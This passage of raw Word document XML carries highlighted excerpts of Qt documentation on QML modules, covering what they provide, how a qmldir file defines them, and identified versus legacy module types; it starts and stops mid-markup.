      <w:bookmarkEnd w:id="328"/>
      <w:bookmarkEnd w:id="329"/>
    </w:p>
    <w:p w:rsidR="003E3556" w:rsidRPr="003E3556" w:rsidRDefault="003E3556" w:rsidP="003E3556">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E3556">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">A QML module </w:t>
      </w:r>
      <w:r w:rsidRPr="003E3556">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>provides versioned types and JavaScript resources in a type namespace</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3556">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> which may be used by clients who import the module. The types which a module provides may be </w:t>
      </w:r>
      <w:r w:rsidRPr="003E3556">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>defined in C++ within a plugin</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3556">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, or </w:t>
      </w:r>
      <w:r w:rsidRPr="003E3556">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>in QML documents</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3556">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. Modules make use of the </w:t>
      </w:r>
      <w:r w:rsidRPr="003E3556">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QML versioning system which allows modules to be independently updated</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3556">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3556" w:rsidRPr="003E3556" w:rsidRDefault="003E3556" w:rsidP="003E3556">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E3556">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Defining of a QML module </w:t>
      </w:r>
      <w:r w:rsidRPr="003E3556">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>allows</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3556">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3556" w:rsidRPr="003E3556" w:rsidRDefault="003E3556" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E3556">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="00184E65">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sharing of common QML types</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3556">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> within a project - for example, a group of UI components that are used by different windows</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3556" w:rsidRPr="003E3556" w:rsidRDefault="003E3556" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E3556">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The distribution of </w:t>
      </w:r>
      <w:r w:rsidRPr="003E3556">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QML-based libraries</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3556" w:rsidRPr="003E3556" w:rsidRDefault="003E3556" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E3556">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="003E3556">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>modularization of distinct features</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3556">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, so that applications only load the libraries necessary for their individual needs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3556" w:rsidRPr="003E3556" w:rsidRDefault="003E3556" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E3556">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Versioning of types and resources</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3556">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> so that the module can be updated safely without breaking client code</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3556" w:rsidRPr="003E3556" w:rsidRDefault="003E3556" w:rsidP="00184E65">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="330" w:name="defining-a-qml-module"/>
      <w:bookmarkStart w:id="331" w:name="_Toc483000602"/>
      <w:bookmarkStart w:id="332" w:name="_Toc483003619"/>
      <w:bookmarkStart w:id="333" w:name="_Toc483603955"/>
      <w:bookmarkStart w:id="334" w:name="_Toc483605175"/>
      <w:bookmarkEnd w:id="330"/>
      <w:r w:rsidRPr="003E3556">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Defining a QML Module</w:t>
      </w:r>
      <w:bookmarkEnd w:id="331"/>
      <w:bookmarkEnd w:id="332"/>
      <w:bookmarkEnd w:id="333"/>
      <w:bookmarkEnd w:id="334"/>
    </w:p>
    <w:p w:rsidR="003E3556" w:rsidRPr="003E3556" w:rsidRDefault="003E3556" w:rsidP="003E3556">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E3556">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>A module is defined by a</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3556">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId282" w:history="1">
        <w:r w:rsidRPr="003E3556">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>module definition qmldir file</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="003E3556">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. Each module has an </w:t>
      </w:r>
      <w:r w:rsidRPr="003E3556">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>associated type namespace</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3556">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, which is the module's identifier. A module can provide QML object types (defined either by QML documents or via a C++ plugin) and JavaScript resources, and </w:t>
      </w:r>
      <w:r w:rsidRPr="003E3556">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>may be imported by clients</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3556">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3556" w:rsidRPr="003E3556" w:rsidRDefault="003E3556" w:rsidP="003E3556">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E3556">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>To define a module</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3556">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, a developer should gather together the various QML documents, JavaScript resources and C++ plugins which belong in the module into a single directory, and write an appropriate</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3556">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId283" w:history="1">
        <w:r w:rsidRPr="003E3556">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>module definition qmldir file</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="003E3556">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="003E3556">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>which should also be placed into the directory. The directory can then be installed into the</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3556">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId284" w:anchor="qml-import-path" w:history="1">
        <w:r w:rsidRPr="003E3556">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QML import path</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="003E3556">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="003E3556">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>as a module.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3556" w:rsidRPr="003E3556" w:rsidRDefault="003E3556" w:rsidP="003E3556">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E3556">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Note that </w:t>
      </w:r>
      <w:r w:rsidRPr="00184E65">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>defining a module is not the only way to share common QML types</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3556">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> within a project - a simple</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3556">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId285" w:history="1">
        <w:r w:rsidRPr="003E3556">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QML document directory import</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="003E3556">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="003E3556">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>may also be used for this purpose.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3556" w:rsidRPr="003E3556" w:rsidRDefault="003E3556" w:rsidP="00184E65">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="335" w:name="supported-qml-module-types"/>
      <w:bookmarkStart w:id="336" w:name="_Toc483000603"/>
      <w:bookmarkStart w:id="337" w:name="_Toc483003620"/>
      <w:bookmarkStart w:id="338" w:name="_Toc483603956"/>
      <w:bookmarkStart w:id="339" w:name="_Toc483605176"/>
      <w:bookmarkEnd w:id="335"/>
      <w:r w:rsidRPr="00184E65">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Supported QML</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3556">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Module Types</w:t>
      </w:r>
      <w:bookmarkEnd w:id="336"/>
      <w:bookmarkEnd w:id="337"/>
      <w:bookmarkEnd w:id="338"/>
      <w:bookmarkEnd w:id="339"/>
    </w:p>
    <w:p w:rsidR="003E3556" w:rsidRPr="003E3556" w:rsidRDefault="003E3556" w:rsidP="003E3556">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E3556">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>There are two different types of modules supported by QML:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3556" w:rsidRPr="003E3556" w:rsidRDefault="00490E7E" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId286" w:history="1">
        <w:r w:rsidR="003E3556" w:rsidRPr="003E3556">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>Identified Modules</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="003E3556" w:rsidRPr="003E3556" w:rsidRDefault="00490E7E" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId287" w:history="1">
        <w:r w:rsidR="003E3556" w:rsidRPr="003E3556">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>Legacy Modules</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="003E3556" w:rsidRPr="003E3556">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="003E3556" w:rsidRPr="003E3556">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(deprecated)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3556" w:rsidRPr="003E3556" w:rsidRDefault="003E3556" w:rsidP="003E3556">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E3556">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Identified</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3556">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> modules </w:t>
      </w:r>
      <w:r w:rsidRPr="00184E65">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>explicitly define their identifier</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3556">
        <w:rPr>
